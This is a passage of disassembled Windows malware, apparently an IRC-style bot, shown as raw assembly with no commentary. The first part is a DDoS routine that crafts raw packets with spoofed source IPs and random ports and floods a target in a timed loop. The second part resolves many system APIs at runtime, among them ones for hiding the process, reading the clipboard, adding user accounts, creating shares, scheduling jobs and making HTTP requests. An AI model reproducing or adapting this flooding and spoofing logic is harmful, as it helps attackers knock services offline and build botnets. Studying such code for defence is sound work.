add esp, 14h
loc_406BF6: ; CODE XREF: sub_406B0C+C7�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
push [ebp+var_198]
call sub_410709
pop ecx
xor eax, eax
jmp loc_407081
; ---------------------------------------------------------------------------
loc_406C22: ; CODE XREF: sub_406B0C+AE�j
mov dword ptr [ebp+optval], 1
push 4 ; optlen
lea eax, [ebp+optval]
push eax ; optval
push 2 ; optname
push 0 ; level
push [ebp+s] ; s
call ds:setsockopt ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_406CB8
call dword_4263C8 ; WSAGetLastError
push eax
push offset aDdosErrorCal_2 ; "[DDOS] Error calling setsockopt(). fWSA"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], 0
jnz short loc_406C8C
push 0
push [ebp+var_C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_19C]
call sub_40A08D
add esp, 14h
loc_406C8C: ; CODE XREF: sub_406B0C+15D�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
push [ebp+var_198]
call sub_410709
pop ecx
xor eax, eax
jmp loc_407081
; ---------------------------------------------------------------------------
loc_406CB8: ; CODE XREF: sub_406B0C+13C�j
lea eax, [ebp+cp]
push eax ; cp
call ds:inet_addr ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_406D38
call dword_4263C8 ; WSAGetLastError
push eax
push offset aDdosInvalidT_0 ; "[DDOS] :Invalid target IP."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], 0
jnz short loc_406D0C
push 0
push [ebp+var_C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_19C]
call sub_40A08D
add esp, 14h
loc_406D0C: ; CODE XREF: sub_406B0C+1DD�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
push [ebp+var_198]
call sub_410709
pop ecx
xor eax, eax
jmp loc_407081
; ---------------------------------------------------------------------------
loc_406D38: ; CODE XREF: sub_406B0C+1BC�j
mov [ebp+to.sa_family], 2
push 0 ; hostshort
call ds:htons ; htons
mov word ptr [ebp+to.sa_data], ax
lea eax, [ebp+cp]
push eax ; cp
call ds:inet_addr ; inet_addr
mov dword ptr [ebp+to.sa_data+2], eax
call ds:GetTickCount ; GetTickCount
mov [ebp+var_5F0], eax
lea eax, [ebp+cp]
push eax
push offset aDdosSendingP_0 ; "[DDOS] :Sending packets to %s..."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], 0
jnz short loc_406DB1
push 0
push [ebp+var_C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_19C]
call sub_40A08D
add esp, 14h
loc_406DB1: ; CODE XREF: sub_406B0C+282�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
and [ebp+var_5F4], 0
loc_406DC5: ; CODE XREF: sub_406B0C+4D9�j
call ds:GetTickCount ; GetTickCount
sub eax, [ebp+var_5F0]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_10]
ja loc_406FEA
mov [ebp+namelen], 10h
push 10h ; Size
push 0 ; Val
lea eax, [ebp+name]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+namelen]
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push [ebp+var_19C] ; s
call ds:getsockname ; getsockname
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx
movzx eax, [ebp+name.sa_data+4]
push eax
movzx eax, [ebp+name.sa_data+3]
push eax
movzx eax, [ebp+name.sa_data+2]
push eax
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
lea eax, [ebp+var_1DC]
push eax ; Dest
call _sprintf
add esp, 18h
mov byte_425F08, 45h
push 41Ch ; hostshort
call ds:htons ; htons
mov word_425F0A, ax
mov word_425F0C, 1
and word_425F0E, 0
mov byte_425F10, 80h
mov byte_425F11, 11h
and word_425F12, 0
lea eax, [ebp+var_1DC]
push eax ; cp
call ds:inet_addr ; inet_addr
mov dword_425F14, eax
mov eax, dword ptr [ebp+to.sa_data+2]
mov dword_425F18, eax
and word_425F22, 0
cmp dword ptr [ebp+hostshort], 0
jnz short loc_406EDA
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx ; hostshort
call ds:htons ; htons
mov word_425F1E, ax
jmp short loc_406EE9
; ---------------------------------------------------------------------------
loc_406EDA: ; CODE XREF: sub_406B0C+3B0�j
push dword ptr [ebp+hostshort] ; hostshort
call ds:htons ; htons
mov word_425F1E, ax
loc_406EE9: ; CODE XREF: sub_406B0C+3CC�j
call _rand
cdq
mov ecx, 401h
idiv ecx
mov word_425F1C, dx
push 408h ; hostshort
call ds:htons ; htons
mov word_425F20, ax
push 400h ; Size
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx ; Val
push offset dword_425F24 ; Dst
call _memset
add esp, 0Ch
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 41Ch ; len
push offset byte_425F08 ; buf
push [ebp+s] ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_406FD8
push [ebp+var_5F4]
push 41Ch
call ds:WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+cp]
push eax
push offset aDdosErrorSen_0 ; "[DDOS] :Error sending packets to %s. ea"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
cmp [ebp+var_8], 0
jnz short loc_406FAC
push 0
push [ebp+var_C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_19C]
call sub_40A08D
add esp, 14h
loc_406FAC: ; CODE XREF: sub_406B0C+47D�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+s]
call dword_4264B8 ; closesocket
push [ebp+var_198]
call sub_410709
pop ecx
xor eax, eax
jmp loc_407081
; ---------------------------------------------------------------------------
loc_406FD8: ; CODE XREF: sub_406B0C+446�j
mov eax, [ebp+var_5F4]
inc eax
mov [ebp+var_5F4], eax
jmp loc_406DC5
; ---------------------------------------------------------------------------
loc_406FEA: ; CODE XREF: sub_406B0C+2D1�j
push [ebp+s] ; s
call ds:closesocket ; closesocket
mov eax, [ebp+var_5F4]
imul eax, 41Ch
shr eax, 0Ah
xor edx, edx
div [ebp+var_10]
push eax
mov eax, [ebp+var_5F4]
imul eax, 41Ch
shr eax, 0Ah
shr eax, 0Ah
push eax
push [ebp+var_5F4]
lea eax, [ebp+cp]
push eax
push offset aDdosFinished_0 ; "[DDOS] :Finished sending packets to %s."...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
cmp [ebp+var_8], 0
jnz short loc_407066
push 0
push [ebp+var_C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_19C]
call sub_40A08D
add esp, 14h
loc_407066: ; CODE XREF: sub_406B0C+537�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+var_198]
call sub_410709
pop ecx
xor eax, eax
loc_407081: ; CODE XREF: sub_406B0C+8D�j
; sub_406B0C+111�j ...
pop edi
pop esi
leave
retn 4
sub_406B0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407087 proc near ; CODE XREF: WinMain(x,x,x,x)+67�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
hModule = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 30h
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
mov [ebp+hModule], eax
cmp [ebp+hModule], 0
jz loc_407202
push offset ProcName ; "SetErrorMode"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264CC, eax
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426444, eax
push offset aProcess32first ; "Process32First"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426428, eax
push offset aProcess32next ; "Process32Next"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42636C, eax
push offset aModule32first ; "Module32First"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42632C, eax
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42634C, eax
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263AC, eax
push offset aGetdrivetypea ; "GetDriveTypeA"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426480, eax
push offset aSearchpatha ; "SearchPathA"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264D8, eax
push offset aQueryperforman ; "QueryPerformanceCounter"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426374, eax
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426360, eax
cmp dword_4264CC, 0
jz short loc_4071D0
cmp dword_426444, 0
jz short loc_4071D0
cmp dword_426428, 0
jz short loc_4071D0
cmp dword_42636C, 0
jz short loc_4071D0
cmp dword_42634C, 0
jz short loc_4071D0
cmp dword_4263AC, 0
jz short loc_4071D0
cmp dword_426480, 0
jz short loc_4071D0
cmp dword_4264D8, 0
jz short loc_4071D0
cmp dword_426374, 0
jz short loc_4071D0
cmp dword_426360, 0
jnz short loc_4071DA
loc_4071D0: ; CODE XREF: sub_407087+F6�j
; sub_407087+FF�j ...
mov dword_4264DC, 1
loc_4071DA: ; CODE XREF: sub_407087+147�j
push offset aRegisterservic ; "RegisterServiceProcess"
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426458, eax
cmp dword_426458, 0
jz short loc_407200
push 1
push 0
call dword_426458
loc_407200: ; CODE XREF: sub_407087+16D�j
jmp short loc_407217
; ---------------------------------------------------------------------------
loc_407202: ; CODE XREF: sub_407087+18�j
call ds:GetLastError
mov dword_4264E0, eax
mov dword_4264DC, 1
loc_407217: ; CODE XREF: sub_407087:loc_407200�j
push offset LibFileName ; "user32.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz loc_40731B
push offset aSendmessagea ; "SendMessageA"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42647C, eax
push offset aFindwindowa ; "FindWindowA"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426430, eax
push offset aIswindow ; "IsWindow"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263D0, eax
push offset aDestroywindow ; "DestroyWindow"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264D0, eax
push offset aOpenclipboard ; "OpenClipboard"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263F8, eax
push offset aGetclipboardda ; "GetClipboardData"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426418, eax
push offset aCloseclipboard ; "CloseClipboard"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426474, eax
push offset aExitwindowsex ; "ExitWindowsEx"
push [ebp+var_4] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426390, eax
cmp dword_42647C, 0
jz short loc_40730F
cmp dword_426430, 0
jz short loc_40730F
cmp dword_4263D0, 0
jz short loc_40730F
cmp dword_4264D0, 0
jz short loc_40730F
cmp dword_4263F8, 0
jz short loc_40730F
cmp dword_426418, 0
jz short loc_40730F
cmp dword_426474, 0
jz short loc_40730F
cmp dword_426390, 0
jnz short loc_407319
loc_40730F: ; CODE XREF: sub_407087+247�j
; sub_407087+250�j ...
mov dword_4264E4, 1
loc_407319: ; CODE XREF: sub_407087+286�j
jmp short loc_407330
; ---------------------------------------------------------------------------
loc_40731B: ; CODE XREF: sub_407087+1A2�j
call ds:GetLastError
mov dword_4264E8, eax
mov dword_4264E4, 1
loc_407330: ; CODE XREF: sub_407087:loc_407319�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz loc_407480
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426490, eax
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263E4, eax
push offset aRegsetvalueexa ; "RegSetValueExA"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426448, eax
push offset aRegqueryvaluee ; "RegQueryValueExA"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426358, eax
push offset aRegdeletevalue ; "RegDeleteValueA"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263A8, eax
push offset aRegclosekey ; "RegCloseKey"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426404, eax
cmp dword_426490, 0
jz short loc_4073F0
cmp dword_4263E4, 0
jz short loc_4073F0
cmp dword_426448, 0
jz short loc_4073F0
cmp dword_426358, 0
jz short loc_4073F0
cmp dword_4263A8, 0
jz short loc_4073F0
cmp dword_426404, 0
jnz short loc_4073FA
loc_4073F0: ; CODE XREF: sub_407087+33A�j
; sub_407087+343�j ...
mov dword_4264EC, 1
loc_4073FA: ; CODE XREF: sub_407087+367�j
push offset aOpenprocesstok ; "OpenProcessToken"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42640C, eax
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263EC, eax
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42648C, eax
cmp dword_42640C, 0
jz short loc_40744E
cmp dword_4263EC, 0
jz short loc_40744E
cmp dword_42648C, 0
jnz short loc_407458
loc_40744E: ; CODE XREF: sub_407087+3B3�j
; sub_407087+3BC�j
mov dword_4264EC, 1
loc_407458: ; CODE XREF: sub_407087+3C5�j
push offset aGetusernamea ; "GetUserNameA"
push [ebp+var_30] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426344, eax
cmp dword_426344, 0
jnz short loc_40747E
mov dword_4264EC, 1
loc_40747E: ; CODE XREF: sub_407087+3EB�j
jmp short loc_407495
; ---------------------------------------------------------------------------
loc_407480: ; CODE XREF: sub_407087+2BB�j
call ds:GetLastError
mov dword_4264F0, eax
mov dword_4264EC, 1
loc_407495: ; CODE XREF: sub_407087:loc_40747E�j
push offset aGdi32_dll ; "gdi32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_4075B5
push offset aCreatedca ; "CreateDCA"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426414, eax
push offset aCreatedibsecti ; "CreateDIBSection"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426464, eax
push offset aCreatecompatib ; "CreateCompatibleDC"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42646C, eax
push offset aGetdevicecaps ; "GetDeviceCaps"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42642C, eax
push offset aGetdibcolortab ; "GetDIBColorTable"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426378, eax
push offset aSelectobject ; "SelectObject"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42633C, eax
push offset aBitblt ; "BitBlt"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426468, eax
push offset aDeletedc ; "DeleteDC"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426328, eax
push offset aDeleteobject ; "DeleteObject"
push [ebp+var_24] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263A0, eax
cmp dword_426414, 0
jz short loc_4075A9
cmp dword_426464, 0
jz short loc_4075A9
cmp dword_42646C, 0
jz short loc_4075A9
cmp dword_42642C, 0
jz short loc_4075A9
cmp dword_426378, 0
jz short loc_4075A9
cmp dword_42633C, 0
jz short loc_4075A9
cmp dword_426468, 0
jz short loc_4075A9
cmp dword_426328, 0
jz short loc_4075A9
cmp dword_4263A0, 0
jnz short loc_4075B3
loc_4075A9: ; CODE XREF: sub_407087+4D8�j
; sub_407087+4E1�j ...
mov dword_4264F4, 1
loc_4075B3: ; CODE XREF: sub_407087+520�j
jmp short loc_4075CA
; ---------------------------------------------------------------------------
loc_4075B5: ; CODE XREF: sub_407087+420�j
call ds:GetLastError
mov dword_4264F8, eax
mov dword_4264F4, 1
loc_4075CA: ; CODE XREF: sub_407087:loc_4075B3�j
push offset aWs2_32_dll ; "ws2_32.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40796B
push offset aWsastartup ; "WSAStartup"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263B4, eax
push offset aWsasocketa ; "WSASocketA"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264C4, eax
push offset aWsaasyncselect ; "WSAAsyncSelect"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426368, eax
push offset a__wsafdisset ; "__WSAFDIsSet"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426348, eax
push offset aWsaioctl ; "WSAIoctl"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263DC, eax
push offset aWsagetlasterro ; "WSAGetLastError"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263C8, eax
push offset aWsacleanup ; "WSACleanup"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42639C, eax
push offset aSocket ; "socket"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264A0, eax
push offset aIoctlsocket ; "ioctlsocket"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264BC, eax
push offset aConnect ; "connect"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263D8, eax
push offset aInet_ntoa ; "inet_ntoa"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264AC, eax
push offset aInet_addr ; "inet_addr"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426460, eax
push offset aHtons ; "htons"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426424, eax
push offset aHtonl ; "htonl"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426420, eax
push offset aNtohs ; "ntohs"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426384, eax
push offset aNtohl ; "ntohl"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42637C, eax
push offset aSend ; "send"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426470, eax
push offset aSendto ; "sendto"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426484, eax
push offset aRecv ; "recv"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42643C, eax
push offset aRecvfrom ; "recvfrom"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426400, eax
push offset aBind ; "bind"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426450, eax
push offset aSelect ; "select"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426410, eax
push offset aListen ; "listen"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42644C, eax
push offset aAccept ; "accept"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264B4, eax
push offset aSetsockopt ; "setsockopt"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426408, eax
push offset aGetsockname ; "getsockname"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263D4, eax
push offset aGethostname ; "gethostname"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426438, eax
push offset aGethostbyname ; "gethostbyname"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264A4, eax
push offset aGethostbyaddr ; "gethostbyaddr"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263E8, eax
push offset aGetpeername ; "getpeername"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426398, eax
push offset aClosesocket ; "closesocket"
push [ebp+var_10] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264B8, eax
cmp dword_4263B4, 0
jz loc_40795F
cmp dword_4264C4, 0
jz loc_40795F
cmp dword_426368, 0
jz loc_40795F
cmp dword_4263DC, 0
jz loc_40795F
cmp dword_4263C8, 0
jz loc_40795F
cmp dword_42639C, 0
jz loc_40795F
cmp dword_4264A0, 0
jz loc_40795F
cmp dword_4264BC, 0
jz loc_40795F
cmp dword_4263D8, 0
jz loc_40795F
cmp dword_4264AC, 0
jz loc_40795F
cmp dword_426460, 0
jz loc_40795F
cmp dword_426424, 0
jz loc_40795F
cmp dword_426420, 0
jz loc_40795F
cmp dword_426384, 0
jz short loc_40795F
cmp dword_426470, 0
jz short loc_40795F
cmp dword_426484, 0
jz short loc_40795F
cmp dword_42643C, 0
jz short loc_40795F
cmp dword_426400, 0
jz short loc_40795F
cmp dword_426450, 0
jz short loc_40795F
cmp dword_426410, 0
jz short loc_40795F
cmp dword_42644C, 0
jz short loc_40795F
cmp dword_4264B4, 0
jz short loc_40795F
cmp dword_426408, 0
jz short loc_40795F
cmp dword_4263D4, 0
jz short loc_40795F
cmp dword_426438, 0
jz short loc_40795F
cmp dword_4264A4, 0
jz short loc_40795F
cmp dword_4263E8, 0
jz short loc_40795F
cmp dword_4264B8, 0
jnz short loc_407969
loc_40795F: ; CODE XREF: sub_407087+7AF�j
; sub_407087+7BC�j ...
mov dword_4264FC, 1
loc_407969: ; CODE XREF: sub_407087+8D6�j
jmp short loc_407980
; ---------------------------------------------------------------------------
loc_40796B: ; CODE XREF: sub_407087+555�j
call ds:GetLastError
mov dword_426500, eax
mov dword_4264FC, 1
loc_407980: ; CODE XREF: sub_407087:loc_407969�j
push offset aWininet_dll ; "wininet.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_407AED
push offset aInternetgetcon ; "InternetGetConnectedState"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42638C, eax
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426330, eax
push offset aHttpopenreques ; "HttpOpenRequestA"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263F4, eax
push offset aHttpsendreques ; "HttpSendRequestA"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263B8, eax
push offset aInternetconnec ; "InternetConnectA"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263FC, eax
push offset aInternetopena ; "InternetOpenA"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263CC, eax
push offset aInternetopenur ; "InternetOpenUrlA"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42635C, eax
push offset aInternetcracku ; "InternetCrackUrlA"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426354, eax
push offset aInternetreadfi ; "InternetReadFile"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426364, eax
push offset aInternetcloseh ; "InternetCloseHandle"
push [ebp+var_1C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426454, eax
cmp dword_42638C, 0
jz short loc_407AB0
cmp dword_426330, 0
jz short loc_407AB0
cmp dword_4263F4, 0
jz short loc_407AB0
cmp dword_4263B8, 0
jz short loc_407AB0
cmp dword_4263FC, 0
jz short loc_407AB0
cmp dword_4263CC, 0
jz short loc_407AB0
cmp dword_42635C, 0
jz short loc_407AB0
cmp dword_426354, 0
jz short loc_407AB0
cmp dword_426364, 0
jz short loc_407AB0
cmp dword_426454, 0
jnz short loc_407ABA
loc_407AB0: ; CODE XREF: sub_407087+9D6�j
; sub_407087+9DF�j ...
mov dword_426504, 1
loc_407ABA: ; CODE XREF: sub_407087+A27�j
cmp dword_4263CC, 0
jz short loc_407AEB
push 0
push 0
push 0
push 0
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call dword_4263CC ; InternetOpenA
mov dword_4263E0, eax
cmp dword_4263E0, 0
jnz short loc_407AEB
and dword_4263E0, 0
loc_407AEB: ; CODE XREF: sub_407087+A3A�j
; sub_407087+A5B�j
jmp short loc_407B09
; ---------------------------------------------------------------------------
loc_407AED: ; CODE XREF: sub_407087+90B�j
call ds:GetLastError
mov dword_426508, eax
mov dword_426504, 1
and dword_4263E0, 0
loc_407B09: ; CODE XREF: sub_407087:loc_407AEB�j
push offset aNetapi32_dll ; "netapi32.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz loc_407C61
push offset aNetshareadd ; "NetShareAdd"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426350, eax
push offset aNetsharedel ; "NetShareDel"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426338, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426394, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263BC, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264B0, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426380, eax
push offset aNetuseradd ; "NetUserAdd"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426340, eax
push offset aNetuserdel ; "NetUserDel"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426334, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263A4, eax
push offset aNetusergetinfo ; "NetUserGetInfo"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426478, eax
push offset aNetmessagebuff ; "NetMessageBufferSend"
push [ebp+var_8] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426434, eax
cmp dword_426350, 0
jz short loc_407C55
cmp dword_426338, 0
jz short loc_407C55
cmp dword_426394, 0
jz short loc_407C55
cmp dword_4263BC, 0
jz short loc_407C55
cmp dword_4264B0, 0
jz short loc_407C55
cmp dword_426380, 0
jz short loc_407C55
cmp dword_426340, 0
jz short loc_407C55
cmp dword_426334, 0
jz short loc_407C55
cmp dword_4263A4, 0
jz short loc_407C55
cmp dword_426478, 0
jz short loc_407C55
cmp dword_426434, 0
jnz short loc_407C5F
loc_407C55: ; CODE XREF: sub_407087+B72�j
; sub_407087+B7B�j ...
mov dword_426514, 1
loc_407C5F: ; CODE XREF: sub_407087+BCC�j
jmp short loc_407C76
; ---------------------------------------------------------------------------
loc_407C61: ; CODE XREF: sub_407087+A94�j
call ds:GetLastError
mov dword_426518, eax
mov dword_426514, 1
loc_407C76: ; CODE XREF: sub_407087:loc_407C5F�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_407CCE
push offset aDnsflushresolv ; "DnsFlushResolverCache"
